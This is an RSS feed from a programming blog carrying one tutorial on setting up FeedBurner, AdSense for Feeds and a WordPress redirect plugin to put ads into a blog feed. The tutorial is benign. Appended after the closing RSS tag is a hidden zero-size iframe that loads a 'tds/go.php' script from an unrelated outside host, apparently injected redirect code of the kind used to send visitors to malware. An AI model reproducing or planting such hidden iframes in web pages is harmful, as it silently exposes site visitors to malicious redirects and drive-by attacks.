<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>dijexi.com &#187; adsense for feed</title>
	<atom:link href="http://www.dijexi.com/tag/adsense-for-feed/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dijexi.com</link>
	<description>free programming tutorial, tips and tricks on php, codeigniter, delphi, dotnet, ajax and more..</description>
	<lastBuildDate>Fri, 13 Jan 2012 23:21:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<atom:link rel="hub" href="http://pubsubhubbub.appspot.com"/><atom:link rel="hub" href="http://superfeedr.com/hubbub"/>		<item>
		<title>How To Setup Google AdSense for Feed in WordPress</title>
		<link>http://www.dijexi.com/2009/08/how-to-setup-google-adsense-for-feed-in-wordpress/</link>
		<comments>http://www.dijexi.com/2009/08/how-to-setup-google-adsense-for-feed-in-wordpress/#comments</comments>
		<pubDate>Wed, 05 Aug 2009 03:55:12 +0000</pubDate>
		<dc:creator>akhmad daniel sembiring</dc:creator>
				<category><![CDATA[AdSense]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[adsense for feed]]></category>
		<category><![CDATA[feedburner]]></category>

		<guid isPermaLink="false">http://www.dijexi.com/2009/08/how-to-setup-google-adsense-for-feed-in-wordpress/</guid>
		<description><![CDATA[One way to increase your AdSense revenue is to put them in your blog feed, so your readers subscribing to the feed will get advertisement banners and text provided by AdSense. It will increase the ads impression and will impact to the increase of your revenue. This article explains how to configure Feedburner feed for [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>One way to increase your AdSense revenue is to put them in your blog feed, so your readers subscribing to the feed will get advertisement banners and text provided by AdSense. It will increase the ads impression and will impact to the increase of your revenue. This article explains how to configure Feedburner feed for your web or blog, setup AdSense for feed, and setup a WordPress plugin to redirect all feed request to your blog to Feedburner feed that’s already setup.</p>
<p> <span id="more-1100"></span>
<p>&#160;</p>
<h2><a href="http://www.dijexi.com/wp-content/uploads/2009/08/1.png"><img style="border-bottom: 0px; border-left: 0px; margin: 0px 10px 0px 0px; display: inline; border-top: 0px; border-right: 0px" title="1" border="0" alt="1" align="left" src="http://www.dijexi.com/wp-content/uploads/2009/08/1_thumb.png" width="84" height="81" /></a>Setup FeedBurner feed</h2>
<p>First thing to do is to setup a feed address by FeedBurner. Log into <a href="http://feedburner.google.com">http://feedburner.google.com</a> and use your Google account.&#160; FeedBurner is a feed republishing service which will read feed provided by your web or blog and then publish it to your readers. This way, you can get a statistic of your readers, traffic analysis, and advertisements.</p>
<p>After log into Feedburner account, you will see a page like this. </p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/SetupFeedburner.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Setup Feedburner" border="0" alt="Setup Feedburner" src="http://www.dijexi.com/wp-content/uploads/2009/08/SetupFeedburner_thumb.png" width="504" height="260" /></a> </p>
<p>You need to enter your web or blog feed address on the bottom field and click Next button. If you do not know your feed address, try to look at your web or blog and find a link with a title “Feed” or this icon <a href="http://www.dijexi.com/wp-content/uploads/2009/08/image4.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image" border="0" alt="image" src="http://www.dijexi.com/wp-content/uploads/2009/08/image_thumb4.png" width="21" height="23" /></a> . If you use WordPress, then the feed address will likely be <a href="http://yourblog.com/feed">http://yourblog.com/feed</a> , in this example we are going to use my personal blog’s feed located at <a href="http://akhdaniel.wordpress.com/feed">http://akhdaniel.wordpress.com/feed</a>. </p>
<p>Click Next button when you are done.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/SetupFeedburnerspecifyfeedtitle.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Setup Feedburner specify feed title" border="0" alt="Setup Feedburner specify feed title" src="http://www.dijexi.com/wp-content/uploads/2009/08/SetupFeedburnerspecifyfeedtitle_thumb.png" width="504" height="500" /></a> </p>
<p>Next, you need to enter the title of your feed and specify the FeedBurner address for your new feed. This new address is the one that your readers will use for subscribing to your feed. But, different from your original WordPress feed it will be tracked for statistics, traffic analysis, and advertisements (if we have done the last step later).</p>
<p>Click on Next button.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/Feedburnerfeedsetupcomplete.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Feedburner feed setup complete" border="0" alt="Feedburner feed setup complete" src="http://www.dijexi.com/wp-content/uploads/2009/08/Feedburnerfeedsetupcomplete_thumb.png" width="504" height="504" /></a> </p>
<p>Your FeedBurner feed address is now complete. Please note the address provided there, in this example <a href="http://feeds.feedburner.com/AkhmadDSembiringWeblog">http://feeds.feedburner.com/AkhmadDSembiringWeblog</a>. We will use this address for the next steps and also this URL is the address that you should publish to your reader that are going to subscribe to your feed.</p>
<p>In this step we just click on “Skip directly to feed management” link. Later, we can add additional statistics features to this feed. You will be redirected to this confirmation page:</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/Newfeedburnerfeedcreated1.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="New feedburner feed created 1" border="0" alt="New feedburner feed created 1" src="http://www.dijexi.com/wp-content/uploads/2009/08/Newfeedburnerfeedcreated1_thumb.png" width="504" height="212" /></a> </p>
<p>Click on “My Feed” link, and click the title of your new feed, then a page like this will appear.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/Newfeedburnerfeedcreated.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="New feedburner feed created" border="0" alt="New feedburner feed created" src="http://www.dijexi.com/wp-content/uploads/2009/08/Newfeedburnerfeedcreated_thumb.png" width="504" height="302" /></a> </p>
<p>You are done! Your FeedBurner is now ready for publishing. If you post a new article on your web or blog, FeedBurner will read it and republish it using the new FeedBurner address above.</p>
<p>&#160;</p>
<h2><a href="http://www.dijexi.com/wp-content/uploads/2009/08/2.png"><img style="border-bottom: 0px; border-left: 0px; margin: 0px 10px 0px 0px; display: inline; border-top: 0px; border-right: 0px" title="2" border="0" alt="2" align="left" src="http://www.dijexi.com/wp-content/uploads/2009/08/2_thumb.png" width="85" height="82" /></a>Setup Google AdSense</h2>
<p>Next thing to do is to setup an Adsense for feed. Log in to your Google AdSense account, and click on AdSense Setup tab then ”Get Ads” link. Click on “AdSense for Feeds” link.</p>
<p>&#160;</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/SetupAdSenseforFeed.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Setup AdSense for Feed" border="0" alt="Setup AdSense for Feed" src="http://www.dijexi.com/wp-content/uploads/2009/08/SetupAdSenseforFeed_thumb.png" width="504" height="383" /></a> </p>
<p>Next, you need to configure a FeedBurner feed to be attached with AdSense for feed.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/ConfigureAdSenseforFeedunit.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Configure AdSense for Feed unit" border="0" alt="Configure AdSense for Feed unit" src="http://www.dijexi.com/wp-content/uploads/2009/08/ConfigureAdSenseforFeedunit_thumb.png" width="504" height="521" /></a> </p>
<p>On the page that appears, specify the ad type, size, frequency, layout and color by selecting on the appropriate fields. You could optionally set the channel for later analytic purpose.</p>
<p>The most important part is to set the feed. Google AdSense automatically detects whether we have already set any FeedBurner feed before or not, and if you did, it will appear in the “Feed” selection like the above example, if it has not have an ad unit attached.</p>
<p>Just click the “Save” button and you are done!</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/Donecreatingadsensefeedunit.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Done creating adsense feed unit" border="0" alt="Done creating adsense feed unit" src="http://www.dijexi.com/wp-content/uploads/2009/08/Donecreatingadsensefeedunit_thumb.png" width="504" height="221" /></a> </p>
<p>Please wait for about 10 minutes, and then check your Feedburner feed address by entering the feed URL in browser. For example, <a href="http://feeds.feedburner.com/AkhmadDSembiringWeblog">http://feeds.feedburner.com/AkhmadDSembiringWeblog</a>. </p>
<p>&#160;<a href="http://www.dijexi.com/wp-content/uploads/2009/08/Feedburnerfeedwithadsenseinaction.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Feedburner feed with adsense in action" border="0" alt="Feedburner feed with adsense in action" src="http://www.dijexi.com/wp-content/uploads/2009/08/Feedburnerfeedwithadsenseinaction_thumb.png" width="504" height="485" /></a> </p>
<p>As you can see, now each feed entry will be attached with one AdSense advertisement. If your readers click the ads then you will get your AdSense revenue.</p>
<p>In addition, you are now able to provide your reader many kind on subscription channel like email, XML, My Yahoo, Google, My AOL, newsgator, netvibes, etc.</p>
<p>&#160;</p>
<h2><a href="http://www.dijexi.com/wp-content/uploads/2009/08/3.png"><img style="border-bottom: 0px; border-left: 0px; margin: 0px 10px 0px 0px; display: inline; border-top: 0px; border-right: 0px" title="3" border="0" alt="3" align="left" src="http://www.dijexi.com/wp-content/uploads/2009/08/3_thumb.png" width="82" height="81" /></a> Setup WordPress Plugin</h2>
<p>Last step it to redirect all traffic to your original feed address to your FeedBurner feed address. For example if your original feed address was <a href="http://akhdaniel.wordpress.com/feed">http://akhdaniel.wordpress.com/feed</a>. Then you need to redirect it to your Feedburner feed address like <a href="http://feeds.feedburner.com/AkhmadDSembiringWeblog">http://feeds.feedburner.com/AkhmadDSembiringWeblog</a>. </p>
<p>This can be done in several ways: editing .htaccess file, editing some code in WordPress program, and installing a plugin. We will choose the easiest one: using the plugin. Here we use the FD Feedburner plugin by John Watson at <a title="http://flagrantdisregard.com/feedburner/" href="http://flagrantdisregard.com/feedburner/">http://flagrantdisregard.com/feedburner/</a>.</p>
<p>After installing the plugin at the WordPress Administration page, go to the plugin setting page, which is quite simple.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/08/Feedburnerwordpresspluginsetting.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="Feedburner wordpress plugin setting" border="0" alt="Feedburner wordpress plugin setting" src="http://www.dijexi.com/wp-content/uploads/2009/08/Feedburnerwordpresspluginsetting_thumb.png" width="504" height="204" /></a> </p>
<p>You just need to enter your FeedBurner feed address and click Save button. That’s it.</p>
<p>Now, all traffics that directed to your original feed address will be redirected by the plugin to your FeedBurner feed address. This including all existing links to the original feed on the theme files, so you don’t need to do anything with the theme files nor the .htaccess file. </p>
<p>The feed content will be the same with the original since FeedBurner checks the original feed regularly, but this time it’s attached with AdSense advertisement and you can track your reader statistics, manage subscriptions, reporting for analytic purpose, and much more.</p>
</p>
</p>
</p>
</p>
</p>
</p>
</p>
</p>
<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:0767317B-992E-4b12-91E0-4F059A8CECA8:ea9be949-c377-4a0f-a4ac-b15caa375d52" class="wlWriterEditableSmartContent">Technorati Tags: <a href="http://technorati.com/tags/adsense+for+feed" rel="tag">adsense for feed</a>,<a href="http://technorati.com/tags/feedburner" rel="tag">feedburner</a>,<a href="http://technorati.com/tags/Wordpress+plugin" rel="tag">WordPress plugin</a></div>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://www.dijexi.com/2009/07/setup-google-adsense-for-search-in-wordpress/" rel="bookmark">Setup Google AdSense for Search in WordPress</a></li><li><a href="http://www.dijexi.com/2009/07/best-wordpress-plugin-for-google-adsense/" rel="bookmark">Best WordPress Plugin for Google Adsense</a></li><li><a href="http://www.dijexi.com/2009/07/best-wordpress-plugin-for-facebook/" rel="bookmark">Best WordPress Plugin for Facebook</a></li><li><a href="http://www.dijexi.com/2009/07/how-to-put-google-adsense-link-unit-on-a-wordpress-theme-header/" rel="bookmark">How To Put Google AdSense Link Unit on a WordPress Theme Header</a></li><li><a href="http://www.dijexi.com/2009/07/list-of-free-downloadable-wordpress-themes/" rel="bookmark">List of Free Downloadable WordPress Themes</a></li></ul></div><!--INFOLINKS_OFF--><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fwww.dijexi.com%2F2009%2F08%2Fhow-to-setup-google-adsense-for-feed-in-wordpress%2F&amp;linkname=How%20To%20Setup%20Google%20AdSense%20for%20Feed%20in%20WordPress"><img src="http://www.dijexi.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a>]]></content:encoded>
			<wfw:commentRss>http://www.dijexi.com/2009/08/how-to-setup-google-adsense-for-feed-in-wordpress/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
